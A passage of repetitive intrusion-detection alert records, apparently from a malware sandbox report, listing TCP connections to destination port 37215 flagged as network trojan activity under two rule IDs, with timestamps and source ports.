                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200501
                SID:2835222
                Source Port:41658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943785
                SID:2829579
                Source Port:39054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682748
                SID:2829579
                Source Port:53496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790738
                SID:2829579
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942355
                SID:2835222
                Source Port:54118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916526
                SID:2829579
                Source Port:47396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944695
                SID:2829579
                Source Port:39032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365918
                SID:2829579
                Source Port:40458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676103
                SID:2829579
                Source Port:59352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878341
                SID:2835222
                Source Port:60066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149406
                SID:2829579
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860883
                SID:2835222
                Source Port:53238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253873
                SID:2835222
                Source Port:57630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471469
                SID:2829579
                Source Port:36360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421646
                SID:2829579
                Source Port:46288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811425
                SID:2835222
                Source Port:38844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677158
                SID:2829579
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517229
                SID:2835222
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276609
                SID:2829579
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275018
                SID:2835222
                Source Port:56628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470931
                SID:2829579
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662387
                SID:2829579
                Source Port:53058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662615
                SID:2829579
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790579
                SID:2835222
                Source Port:51182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914870
                SID:2829579
                Source Port:58110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545536
                SID:2835222
                Source Port:34878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146945
                SID:2829579
                Source Port:53820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021720
                SID:2835222
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177181
                SID:2835222
                Source Port:36068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022456
                SID:2829579
                Source Port:53016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050659
                SID:2829579
                Source Port:44946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972546
                SID:2829579
                Source Port:57084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277939
                SID:2835222
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.775462
                SID:2835222
                Source Port:52118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902300
                SID:2835222
                Source Port:41112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542708
                SID:2835222
                Source Port:51290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091447
                SID:2835222
                Source Port:41532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675323
                SID:2835222
                Source Port:39346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111593
                SID:2835222
                Source Port:54830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681847
                SID:2835222
                Source Port:44140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761950
                SID:2835222
                Source Port:40702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383378
                SID:2835222
                Source Port:44224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614330
                SID:2835222
                Source Port:49148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057382
                SID:2829579
                Source Port:47778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115248
                SID:2835222
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879182
                SID:2829579
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020534
                SID:2829579
                Source Port:43838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382843
                SID:2835222
                Source Port:48478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342802
                SID:2835222
                Source Port:52492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934539
                SID:2829579
                Source Port:54772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051652
                SID:2829579
                Source Port:59732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881625
                SID:2829579
                Source Port:38402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829455
                SID:2835222
                Source Port:53264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966127
                SID:2835222
                Source Port:38678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616654
                SID:2829579
                Source Port:58742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715309
                SID:2835222
                Source Port:37440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423682
                SID:2835222
                Source Port:46916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277786
                SID:2835222
                Source Port:54934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543335
                SID:2829579
                Source Port:40436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504636
                SID:2835222
                Source Port:36460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186090
                SID:2829579
                Source Port:45580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765617
                SID:2835222
                Source Port:57366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184513
                SID:2829579
                Source Port:52326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178242
                SID:2829579
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670880
                SID:2829579
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411603
                SID:2835222
                Source Port:41758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.976856
                SID:2835222
                Source Port:42996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421174
                SID:2835222
                Source Port:59122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569524
                SID:2835222
                Source Port:43066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177088
                SID:2829579
                Source Port:50296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152634
                SID:2829579
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616454
                SID:2829579
                Source Port:41662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542634
                SID:2835222
                Source Port:44270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023680
                SID:2835222
                Source Port:36830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944661
                SID:2829579
                Source Port:40932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762013
                SID:2835222
                Source Port:51372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051814
                SID:2829579
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568859
                SID:2835222
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914690
                SID:2829579
                Source Port:56804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970844
                SID:2829579
                Source Port:47164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423369
                SID:2835222
                Source Port:44148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031536
                SID:2829579
                Source Port:56020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018435
                SID:2835222
                Source Port:38536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325945
                SID:2829579
                Source Port:37136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807252
                SID:2829579
                Source Port:40658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143672
                SID:2829579
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914236
                SID:2829579
                Source Port:43052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027816
                SID:2835222
                Source Port:59178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135133
                SID:2835222
                Source Port:44696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148717
                SID:2835222
                Source Port:57018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809181
                SID:2829579
                Source Port:45222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547197
                SID:2829579
                Source Port:39270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761552
                SID:2829579
                Source Port:54030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409031
                SID:2829579
                Source Port:44044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763946
                SID:2829579
                Source Port:53662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019359
                SID:2835222
                Source Port:35068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202178
                SID:2835222
                Source Port:35610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985305
                SID:2835222
                Source Port:56028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411116
                SID:2829579
                Source Port:55558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451912
                SID:2829579
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646579
                SID:2829579
                Source Port:44290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686462
                SID:2835222
                Source Port:56512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724756
                SID:2829579
                Source Port:46434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944731
                SID:2835222
                Source Port:42638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701740
                SID:2835222
                Source Port:52984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717805
                SID:2835222
                Source Port:51316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860490
                SID:2835222
                Source Port:53922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518061
                SID:2835222
                Source Port:55258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676197
                SID:2835222
                Source Port:56984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471997
                SID:2835222
                Source Port:45642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338883
                SID:2829579
                Source Port:55280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027242
                SID:2829579
                Source Port:35744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944298
                SID:2829579
                Source Port:46802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472851
                SID:2829579
                Source Port:35576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.086204
                SID:2829579
                Source Port:37850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663064
                SID:2835222
                Source Port:42436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014982
                SID:2835222
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325491
                SID:2829579
                Source Port:48796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947242
                SID:2829579
                Source Port:41152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689000
                SID:2835222
                Source Port:38864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057633
                SID:2829579
                Source Port:52628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765422
                SID:2829579
                Source Port:34342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253528
                SID:2835222
                Source Port:33990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989628
                SID:2835222
                Source Port:41676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625432
                SID:2835222
                Source Port:49066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073269
                SID:2829579
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846759
                SID:2829579
                Source Port:37278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226096
                SID:2829579
                Source Port:41118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161634
                SID:2835222
                Source Port:36552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149140
                SID:2829579
                Source Port:53894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668528
                SID:2835222
                Source Port:37650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828866
                SID:2835222
                Source Port:38956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343565
                SID:2829579
                Source Port:58324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917863
                SID:2829579
                Source Port:46840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181349
                SID:2829579
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243084
                SID:2829579
                Source Port:43468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024676
                SID:2829579
                Source Port:60288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131805
                SID:2829579
                Source Port:32806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618164
                SID:2835222
                Source Port:39200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115898
                SID:2829579
                Source Port:49762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322288
                SID:2829579
                Source Port:55410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968803
                SID:2835222
                Source Port:58956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056030
                SID:2835222
                Source Port:44204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999411
                SID:2829579
                Source Port:49692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667010
                SID:2835222
                Source Port:39560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933539
                SID:2829579
                Source Port:34924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111623
                SID:2829579
                Source Port:57900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967396
                SID:2835222
                Source Port:49864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051871
                SID:2829579
                Source Port:55978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969580
                SID:2829579
                Source Port:57668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858707
                SID:2829579
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977925
                SID:2829579
                Source Port:38068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340849
                SID:2835222
                Source Port:58696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031658
                SID:2829579
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324507
                SID:2835222
                Source Port:47608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776365
                SID:2835222
                Source Port:49312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881825
                SID:2835222
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978987
                SID:2835222
                Source Port:34128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663711
                SID:2829579
                Source Port:53860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564443
                SID:2835222
                Source Port:53568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367824
                SID:2835222
                Source Port:52964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978431
                SID:2829579
                Source Port:40408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420753
                SID:2835222
                Source Port:40620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367363
                SID:2835222
                Source Port:57462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792382
                SID:2829579
                Source Port:51260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032025
                SID:2829579
                Source Port:51402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163143
                SID:2829579
                Source Port:59744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805844
                SID:2835222
                Source Port:35698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180407
                SID:2829579
                Source Port:36136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073426
                SID:2835222
                Source Port:55992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084133
                SID:2829579
                Source Port:44518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.231018
                SID:2835222
                Source Port:40866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566239
                SID:2829579
                Source Port:38630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702985
                SID:2829579
                Source Port:53754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915779
                SID:2829579
                Source Port:39132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502301
                SID:2829579
                Source Port:32768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013027
                SID:2829579
                Source Port:59368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277855
                SID:2835222
                Source Port:49498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423754
                SID:2835222
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185354
                SID:2829579
                Source Port:35502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185459
                SID:2835222
                Source Port:35874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424886
                SID:2829579
                Source Port:38248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111878
                SID:2829579
                Source Port:33568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073031
                SID:2835222
                Source Port:45374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111764
                SID:2835222
                Source Port:44342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177623
                SID:2835222
                Source Port:36404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275596
                SID:2829579
                Source Port:54098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289695
                SID:2835222
                Source Port:39132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133502
                SID:2835222
                Source Port:52304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149437
                SID:2835222
                Source Port:45238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545205
                SID:2835222
                Source Port:54940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806339
                SID:2829579
                Source Port:53132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276474
                SID:2835222
                Source Port:46276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879851
                SID:2835222
                Source Port:37790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045461
                SID:2829579
                Source Port:38660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881108
                SID:2829579
                Source Port:46966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857763
                SID:2829579
                Source Port:56150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
